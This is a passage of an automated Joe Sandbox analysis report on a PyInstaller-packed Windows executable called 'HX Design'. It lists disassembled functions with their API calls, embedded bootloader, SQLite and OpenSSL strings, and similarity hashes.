Associated: 00000001.00000002.2106827061.00007FFDFBA72000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2106827061.00007FFDFBAAC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2108069571.00007FFDFBAB5000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb460000_HX Design.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
Instruction ID: e5da794066cb80445f9f4987f002fb62e026548d81cfde92beded70aff1fc48c
Opcode Fuzzy Hash: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
Instruction Fuzzy Hash: 5062266272999286E7158F38D41067D77E0F748785F049532EABEC37D8EABCEA45CB00

Function 00007FFDFAD90350 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFAD90E65
GetProcAddress.KERNEL32 ref: 00007FFDFAD90E83
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFAD90F03
VirtualProtect.KERNEL32 ref: 00007FFDFAD90F21

Memory Dump Source

Source File: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true

Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
Instruction ID: 0cb5287a5c4e2259f3bf4a5933617f93466169cd20e2ec617ed92db9a04b5f71
Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
Instruction Fuzzy Hash: 6E62186272859286E7598E38E8107BD77A0F74C789F045531EAAEC37C8FA7CEA45C700

Function 00007FFDFB302250 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB302403

Strings

:memory:, xrefs: 00007FFDFB3022BD

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: :memory:
API String ID: 4225454184-2920599690
Opcode ID: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
Instruction ID: c9883659479a37f32a7d2ae94fba055792d8c770e77a11f413c2c530c1ed075f
Opcode Fuzzy Hash: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
Instruction Fuzzy Hash: 36426121B4A78383EB65AB159960B397BE0FF45B88F084135CEAD427E9DF3CE5958300

Function 00007FF732069280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF7320692B3
FindClose.KERNEL32 ref: 00007FF7320692C2

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 02c21f81cf5930699b53effc15c3261ef440a048d7f8fde97923d82809baa6ad
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 42F0A422A1864686F7609B60B488776F350EB84328F840235DAAD02AD4DF7CD04CDB04

Function 00007FFDFB2F1230 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFDFB2F1255

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
Instruction ID: 61bd7d38b8b2a85ed16f1ee72dfadb09ab9bf3cee9fd7fc59516416eab004d4d
Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
Instruction Fuzzy Hash: BBA1D520F0BB87C1FF588B45A974A7426A0BF45B49F944535CD3E867F8DF2CA6A18301

Function 00007FF732061950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF732067F90: _fread_nolock.LIBCMT ref: 00007FF73206803A

_fread_nolock.LIBCMT ref: 00007FF732061A1B

Part of subcall function 00007FF732062910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E

Strings

fread, xrefs: 00007FF732061A32, 00007FF732061B5C
MEI, xrefs: 00007FF732061991
Could not allocate memory for archive structure!, xrefs: 00007FF732061A61
calloc, xrefs: 00007FF732061A68
Could not read full TOC!, xrefs: 00007FF732061B55
fseek, xrefs: 00007FF7320619F5
Could not allocate buffer for TOC!, xrefs: 00007FF732061B1B
Error on file., xrefs: 00007FF732061B8D
Failed to seek to cookie position!, xrefs: 00007FF7320619EE
malloc, xrefs: 00007FF732061B22
Failed to read cookie!, xrefs: 00007FF732061A2B

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
Instruction ID: 6abbf888d3bef507ff97607c077b66e6df0a285623eb5ece0453c1632daea40a
Opcode Fuzzy Hash: b426b7569fd43417053a9482fb0298cff99dadbc456d732c1d031cb9eee9613e
Instruction Fuzzy Hash: 9B81A571B0C686A5EB20FB14D0402B9E3A1EF88B84FC48531D98D87796DEBCE54DE764

Function 00007FF732061470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF7320615E6
Failed to extract %s: failed to open archive file!, xrefs: 00007FF73206149F
fseek, xrefs: 00007FF7320614E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7320614DE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF732061518
malloc, xrefs: 00007FF73206151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7320615DF

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
Instruction ID: 03f748e23ab184c15441e64723ba966020395d3cb8ef41e5b78a5ffe30c64f04
Opcode Fuzzy Hash: 72f99dadd0a2177c1d42b060d7648ca84eb7dddf70f4030becfdb2944091b5e7
Instruction Fuzzy Hash: 10418121B08643A6EB10FB21D4405BAE390FF44B94FC44532ED9D47B96DEBCE519E728

Function 00007FF732061210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF73206141E
1.3.1, xrefs: 00007FF732061249
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7320612BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF732061276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7320612EF
malloc, xrefs: 00007FF7320612C1, 00007FF7320612F6

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
Instruction ID: 7ba33010c38cec13a7fd246382fb8c393174fd09f7c6121060df5aca34d75fb0
Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
Instruction Fuzzy Hash: 3A510B22B0864265EA20BB15E4403BAE391FF84B94FC84131ED8D47BD5EFBCE549E724

Function 00007FF7320636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF732063804), ref: 00007FF7320636E1
GetLastError.KERNEL32(?,00007FF732063804), ref: 00007FF7320636EB

Part of subcall function 00007FF732062C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
Part of subcall function 00007FF732062C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
Part of subcall function 00007FF732062C50: MessageBoxW.USER32 ref: 00007FF732062D99

Strings

GetModuleFileNameW, xrefs: 00007FF7320636FA
Failed to convert executable path to UTF-8., xrefs: 00007FF732063790
Failed to resolve full path to executable %ls., xrefs: 00007FF732063739
Failed to obtain executable path., xrefs: 00007FF7320636F3
\\?\, xrefs: 00007FF73206375A

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: b618fc54f69114c14a619e3fe3a4bbddf1446a396af661121fa170e6144b99cd
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: BD219561B1864261FA30B724EC543BAE2A0FF88754FC00232D65D825D5EEACE50DE768

Function 00007FF73207BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207BE89

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction ID: 4a19d13d763459d487f822cfd77626a00406124f9568a92944f9add027675a12
Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
Instruction Fuzzy Hash: EBC1D82290C686A2E760BB1994402BEF760FB85B90FD54131EA4E07791DFFCE85DE720

Function 00007FF732066360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF732066456
LoadLibrary, xrefs: 00007FF7320664AE
ucrtbase.dll, xrefs: 00007FF7320663DD
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7320663C7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF732066407
Failed to load Python DLL '%ls'., xrefs: 00007FF7320664A7

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 6bfffda2f71952109638076ae884e7e5d57c5dcfa62dc35d578edba97c4b3a9f
Instruction ID: 967bf6b8a112f732990a34582b8cf334438acd789e15bc2b29f74f267c1dd47d
Opcode Fuzzy Hash: 6bfffda2f71952109638076ae884e7e5d57c5dcfa62dc35d578edba97c4b3a9f
Instruction Fuzzy Hash: B7416021B19A86B1EA25FB20E4542EEA361FF44344FC00132EA5D43699EFBCE51DD764

Function 00007FFDFB2EFFD0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FFDFB2F020A

Strings

psow, xrefs: 00007FFDFB2F0581
exclusive, xrefs: 00007FFDFB2F019B
winOpen, xrefs: 00007FFDFB2F047D
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFB2F02E6

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
Instruction ID: a559c89c79a5ebe649409a3b14b56aa70fa90c39468121af52fe987c000fd7cb
Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
Instruction Fuzzy Hash: 1E027E21B0A683C6FB658F61A964B7A77A0FF84B58F044235DD6E826F8CF3CE5558700

Function 00007FF73207F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF73207FA7C
_get_daylight.LIBCMT ref: 00007FF73207FA8D
_get_daylight.LIBCMT ref: 00007FF73207FA9E
_isindst.LIBCMT ref: 00007FF73207FB69

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 4bb68b1999a5f0fd7d390b880599b61f40378b254580015dbdf67592ec937396
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 93516C72F04211A6FB14FF68D8596BCA7B1AF40358F900236DD2E52AE5DF7CA40AD710

Function 00007FF73207577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7320757AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF732075811
GetLastError.KERNEL32 ref: 00007FF7320758A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7320756B4), ref: 00007FF7320758EE

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction ID: b1d3085229a13e1b89190dbefc57157f28a68d0ee3fa6b06382b4c94098d03a0
Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction Fuzzy Hash: 29519E22E086419AFB50FFB4D4503BDBBA1AB48B58F908435DE0D57A89DFB8D449D320

Function 00007FF732075628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732075655
CreateFileW.KERNEL32 ref: 00007FF732075694
CloseHandle.KERNEL32 ref: 00007FF7320756C9

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction ID: a88995a32b805eaf733e4967039d5cbe0c8f053d25ba20d1071f0a3bfc24d80d
Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction Fuzzy Hash: 4741C822E1878193F750BB6495103B9B760FB94764F508335EAAC07AD1DFBCA1E4D720

Function 00007FFE003114BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFE0036F1C3

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FFE0036F2B5, 00007FFE0036F45C, 00007FFE0036F48F
state_machine, xrefs: 00007FFE0036F2AE, 00007FFE0036F450, 00007FFE0036F483

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction ID: 8b337b5d94f60a9e97ae6456d146367b0c6bd12bc49795a22dcfa0ad283611be
Opcode Fuzzy Hash: b54ccff58f8e80719a599f0acc35fce9342e321a5adb0181e948912c75f3cdda
Instruction Fuzzy Hash: F0A16029A0C6438AFB67AA25F4513BD2395EF45B44F288431DB0D46BFECE7CE8818751

Function 00007FFE0031127B Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFE00358AC5

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FFE00358B6E, 00007FFE00358BCA
ssl3_write_pending, xrefs: 00007FFE00358B62, 00007FFE00358BBE

Memory Dump Source

